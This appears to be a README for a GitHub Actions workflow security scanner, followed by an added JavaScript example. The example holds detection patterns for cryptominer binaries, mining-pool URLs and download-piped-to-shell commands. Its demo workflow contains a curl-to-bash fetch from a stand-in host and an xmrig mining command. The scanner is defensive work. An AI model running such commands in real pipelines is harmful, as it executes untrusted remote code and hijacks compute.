A CLI tool that scans GitHub Actions workflow (.yml) files for malicious commands, cryptominer binaries, and harmful scripts.
Server: Node.js
Clone the project
git clone https://github.com/jugal09xx/github-actions-security-scanner
Go to the project directory
Install dependencies
npm install
Start the server
npm start
The tool can be tested with different action files by adding them to the src/data directory. Make sure to import the file in app.js as well.
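An added example, not the project's own code, of the kind of check described at the top of this README: it pulls the shell commands out of a workflow's run: steps and matches them against a small rule set. The rule names, the patterns and the sample workflow are assumptions made for illustration.

```javascript
// Added example, not code from github-actions-security-scanner.
// RULES is an assumed, minimal rule set chosen for illustration.
const RULES = [
  { id: 'miner-binary', re: /\b(xmrig|minerd|cpuminer|ethminer)\b/i },
  { id: 'mining-pool-url', re: /stratum\+(tcp|ssl):\/\//i },
  { id: 'pipe-to-shell', re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b/i },
  { id: 'decode-and-run', re: /base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba|z)?sh\b/i },
];

// Collect the shell commands of every `run:` key, including `run: |` blocks.
function extractRunLines(yamlText) {
  const out = [];
  let keyCol = -1; // column of the `run:` key while inside a block scalar
  yamlText.split(/\r?\n/).forEach((text, i) => {
    const indent = text.search(/\S/);
    if (keyCol >= 0) {
      if (indent === -1) return; // blank line inside the block
      if (indent > keyCol) { out.push({ line: i + 1, cmd: text.trim() }); return; }
      keyCol = -1; // dedent: the block scalar has ended
    }
    const m = text.match(/^(\s*(?:-\s+)?)run:\s*(.*)$/);
    if (!m) return; // note: `runs-on:` does not match `run:`
    if (/^[|>][+-]?\s*$/.test(m[2])) keyCol = m[1].length;
    else if (m[2]) out.push({ line: i + 1, cmd: m[2] });
  });
  return out;
}

// Return one finding per (command line, matching rule).
function scanWorkflow(yamlText) {
  return extractRunLines(yamlText).flatMap(({ line, cmd }) =>
    RULES.filter((r) => r.re.test(cmd)).map((r) => ({ line, rule: r.id, cmd })));
}

// Constructed workflow for the demo; hosts use the reserved .invalid TLD.
const SAMPLE = [
  'jobs:',
  '  build:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - run: npm ci',
  '      - name: Setup',
  '        run: |',
  '          curl -s https://example.invalid/setup.sh | bash',
  '          ./xmrig -o stratum+tcp://pool.example.invalid:3333',
  '      - run: npm test',
].join('\n');

for (const f of scanWorkflow(SAMPLE)) console.log(`line ${f.line}: ${f.rule}: ${f.cmd}`);
```

Matching on run: commands only keeps step names, comments in other keys and runs-on: values from producing findings; a production scanner would use a real YAML parser instead of the line-based extraction used here.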